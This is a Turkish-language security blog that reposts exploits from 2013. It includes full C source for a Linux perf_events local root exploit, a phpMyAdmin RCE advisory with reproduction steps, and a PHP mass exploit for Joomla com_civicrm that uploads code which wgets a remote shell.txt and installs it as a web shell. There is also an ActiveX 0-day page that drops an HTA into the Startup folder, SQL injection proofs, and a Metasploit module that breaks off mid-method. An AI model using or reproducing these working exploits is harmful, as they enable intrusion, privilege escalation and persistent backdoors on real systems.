SecurityWeb.Org

admin | 31 Mayıs 2013

Linux PERF_EVENTS – Local Root Exploit

linux 2.6.37-3.x.x x86_64, ~100 LOC versiyonunda etkili olduğu bildirilen local root exploite ilişkin code

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/bash", "-sh", NULL);
}

AllgianceMD offers the best web based EMR. With AllegianceMD, you dont have to worry about hardware, installation.

To find a large selection of toner cartridge specifics, check out this website. We found good pricing on what we needed.

admin | 26 Nisan 2013

No comments

phpMyAdmin 3.5.8 and 4.0.0-RC2 – Multiple Vulnerabilities

phpMyAdmin 3.5.8 and 4.0.0-RC2 – Vergiyonunda genel açık bulunmuş olup, açık hakkındaki açıkamalar aşağıdaki şekilde.

[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===============================================================================

Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

###############################################################################
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###############################################################################

Reason:
  1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
  1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
  1. logged in as valid PMA user
  2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
  
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238

Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
  
Result: PMA user is able to execute arbitrary PHP code on webserver

Let's take a look at the source code:

Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . 
                        PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '
          . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
------------------------[ source code end ]------------------------------------

We can see, that PHP variables "$from_prefix" and  "$to_prefix" are used in
preg_replace function without any sanitization. It appears, that those variables
are coming from user submitted POST request as parameters "from_prefix" and
"to_prefix". It is possible to inject e-modifier with terminating null byte via
first parameter and php code via second parameter. In case of successful
exploitation injected PHP code will be executed on PMA webserver.

Tests:

1. Log in to PMA and select database:

http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8

2. select one table from database by using checkbox and then select 
"Replace table prefix" from select control "With selected:".

3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.

4. Activate Tamper Data Firefox add-on:

https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

5. Click "Submit", Tamper Data pops up, choose "Tamper".

6. Now we can modify POST request. Look for parameter "from_prefix".
It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.

7. We are greeted by phpinfo function output - code execution is confirmed.

PMA version 4.0.0-RC2 contains almost identical vulnerability:

Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . 
        ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . 
      ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
------------------------[ source code end ]------------------------------------


############################################################################
2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution
############################################################################

Reason:
  1. insecure names of locally saved dump files
Attack vectors:
  1. user-supplied POST parameter "filename_template"
Preconditions:
  1. logged in as valid PMA user
  2. configuration setting "SaveDir" defined and pointed to
 directory, which is writable for php and directly accessible over web
(by default "SaveDir" is empty and PMA is secure)
  3. Apache webserver with unknown MIME for "sql" extension
  
PMA security advisory: PMASA-2013-3
CVE id: CVE-2013-3239

Affected are PMA versions 3.5.8 and 4.0.0-RC2

There is a security weakness in a way, how PMA handles
locally saved database dump files. It is possible, that saved
dump file has multiple extensions and if Apache webserver does not
know MIME type of "sql" extension (that's how it is by default),
then for example "foobar.php.sql" file will be treated as php file.

More information:

http://httpd.apache.org/docs/2.2/mod/mod_mime.html

section "Files with Multiple Extensions"

http://www.acunetix.com/websitesecurity/upload-forms-threat/

section "Case 4: Double extensions (part 1)"


Test:

1. activate export to local server, be sure, that directory is writable:

$cfg['SaveDir'] = './';

2. select database for test, insert row into table with included
php code like "<?php phpinfo();?>"

3. try to export that database or table, you have now additional option:

"Save on server in the directory ./"

Confirm that option, let the format be as "SQL".
"File name template" change to "@DATABASE ()  php" and click "Go" button.

Server responds with "Dump has been saved to file ./test.php.sql."

4. Request created file with webbrowser:

http://localhost/PMA/test.php.sql

In case of success we can see output of phpinfo() function, which
confirms remote code execution.


###############################################################################
3. Local File Inclusion in "export.php"
###############################################################################

Reason:
  1. insufficient sanitization of user data before using in include_once
Attack vectors:
  1. user-supplied POST parameter "what"
Preconditions:
  1. logged in as valid PMA user
  2. PHP must be < 5.3.4 for null-byte attacks to work

PMA security advisory: PMASA-2013-4
CVE id: CVE-2013-3240

Affected is PMA version 4.0.0-RC2


Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));

// export class instance, not array of properties, as before
$export_plugin = PMA_getPlugin(
    "export",
    $what,
    'libraries/plugins/export/',
    array(
        'export_type' => $export_type,
        'single_table' => isset($single_table)
    )
);
------------------------[ source code end ]------------------------------------


We can see, that user-supplied parameter "what" is used as second argument for
the function PMA_getPlugin(). Let's follow execution flow:


Php script "libraries/plugin_interface.lib.php" line 20:
------------------------[ source code start ]----------------------------------
function PMA_getPlugin(
    $plugin_type,
    $plugin_format,
    $plugins_dir,
    $plugin_param = false
) {
    $GLOBALS['plugin_param'] = $plugin_param;
    $class_name = strtoupper($plugin_type[0])
        . strtolower(substr($plugin_type, 1))
        . strtoupper($plugin_format[0])
        . strtolower(substr($plugin_format, 1));
    $file = $class_name . ".class.php";
    if (is_file($plugins_dir . $file)) {
        include_once $plugins_dir . $file;
------------------------[ source code end ]------------------------------------

As seen above, second argument "$plugin_format" is used in variable "$file"
and after that in functions is_file() and include_once(). No sanitization
is used against user submitted parameter "what", which leads to directory
traversal and local file inclusion vulnerability. In case of older PHP version
it may be possible to use null byte attack and include arbitrary files on server.


###############################################################################
4. $GLOBALS array overwrite in "export.php"
###############################################################################

Reason:
  1. insecure POST parameters importing
 Attack vectors:
  1. user-supplied POST parameters
Preconditions:
  1. logged in as valid PMA user

PMA security advisory: PMASA-2013-5
CVE id: CVE-2013-3241

Affected is PMA version 4.0.0-RC2


Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));
------------------------[ source code end ]------------------------------------

We can see, that arbitrary values in $GLOBALS array can be overwritten by
submitting POST parameters. Such way of input data importing can be considered
as very insecure and in specific situation it is possible to overwrite any
variable in global scope. This can lead to many ways of exploitation. Below is
presented one of the possibilities.


Php script "export.php" line 59:
------------------------[ source code start ]----------------------------------
$onserver = false;
$save_on_server = false;
...
 if ($quick_export) {
        $onserver = $_REQUEST['quick_export_onserver'];
    } else {
        $onserver = $_REQUEST['onserver'];
    }
    // Will we save dump on server?
    $save_on_server = ! empty($cfg['SaveDir']) && $onserver;
...
// Open file on server if needed
if ($save_on_server) {
    $save_filename = PMA_Util::userDir($cfg['SaveDir'])
        . preg_replace('@[/\\\\]@', '_', $filename);
...
    if (! $file_handle = @fopen($save_filename, 'w')) {
        $message = PMA_Message::error(
...
/* If we saved on server, we have to close file now */
    if ($save_on_server) {
        $write_result = @fwrite($file_handle, $dump_buffer);
        fclose($file_handle);
------------------------[ source code end ]------------------------------------

As seen above, when configuration setting "SaveDir" is set, then it is possible
to save database dump to the PMA webserver. By default "SaveDir" is unset and 
this prevents possible security problems. As we can overwrite any variables in
global scope, it is possible to set "SaveDir" to arbitrary value. This will
lead to directory traversal vulnerability - attacker is able to save database
dump to any directory in webserver, if only filesystem permissions allow that.
Database dump can be with extension ".sql". If attacker can dump database
with php code and tags in it, this content will be in dump file. If filename
is something like "foobar.php.sql", then by default most Apache webserver
installations will try to parse this dump file as php file, which can finally
lead to the remote code execution vulnerability.



Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

16.04.2013 -> Sent email to developers
16.04.2013 -> First response email from developers
16.04.2013 -> Sent detailed information to developers
24.04.2013 -> New PMA versions and security advisories released
25.04.2013 -> Current advisory released


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Category: Genel | Tags: PHPMyAdmin 3.5.8 Açıkları, phpMyAdmin 3.5.8 Multiple Vulnerabilities

admin | 20 Nisan 2013

No comments

joomla component com_civicrm remote code injection exploit

joomla component com_civicrm remote code injection exploit:

Joomla com_civicrm eklentisinde yapmış olduğum testler neticesinde “ofc_upload_image.php” den kaynaklanan açık bulunmuştur.

administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=xxx.php olarak sorguladığımızda administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/xxx.php dosyasının oluştuğu görülecektir. Bu açık sayesinde aşağıda derlemiş olduğum exploit sayesinde server üzerinde her türlü shell çalıştırabilirsiniz. Tarafımdan yazılan aşağıdaki exploit içeriğinden net olarak anlaşılacağı üzere kullanımı basittir. localhost cmd üzerinden çalıştırabileceğimiz gibi back connect yöntemiylede çalıştırabiliriz. exploit açıklı dizine uzaktan shell.txt çağırmakta shell.txt mv komutuyla shell.php ye dönüymekte shell.php yi site.com/tmp dizinine taşımakta ve açığın olduğu /tmp-upload-images/ klasörünü ve içeriğini imha etmekte açığı fixlemektedir.

Php code injection işlemini manuelde yapabilirsiniz. Bunun için Firefox HttpRequester eklentisi vasıtasıyla gerçekleştirebilirsiniz.


# Exploit Title: joomla component com_civicrm remode file injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org

<?php

# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote file upload exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php

$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");

$url = $options['u'];
$file = $options['f'];
$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = '<?php
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ;
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');

echo " [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}

?>

Category: Genel | Tags: com_civcrm remote file upload vulnerability, joomla component com_civicrm remote file upload exploit, joomla com_civicrm code injection

admin | 25 Mart 2013

No comments

LiquidXML Studio 2010 ActiveX Remote 0-day

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

Category: Genel | Tags: LiquidXML Studio Remote Exploit

admin | 25 Mart 2013

No comments

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]


http://localhost/Free/clients/tickets.php?id=[SQLi]


http://localhost/free/clients/viewaccount.php?id=[SQLi]

Cookie based injeciton In 

http://localhost/free/clients/home.php

inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php

http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php

http://localhost/Free/clients/tickets.php?id=[SQLi]

if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php

http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher

Category: Genel | Tags: Free Hosting Manager V2.0.2 Genel SQL Açığı

admin | 25 Mart 2013

No comments

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION[&#39;language&#39;]. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST[&#39;gid&#39;]) && is_numeric($_REQUEST[&#39;gid&#39;]) ) ? mysql_real_escape_string($_REQUEST[&#39;gid&#39;]) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

Category: Genel | Tags: ClipShare 4.1.1 Blind SQL Injection Açığı, ClipShare SQL injectinon exploit

admin | 25 Mart 2013

No comments

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         => 
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     => 
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        => 
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      => 
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  => 
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye byern"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
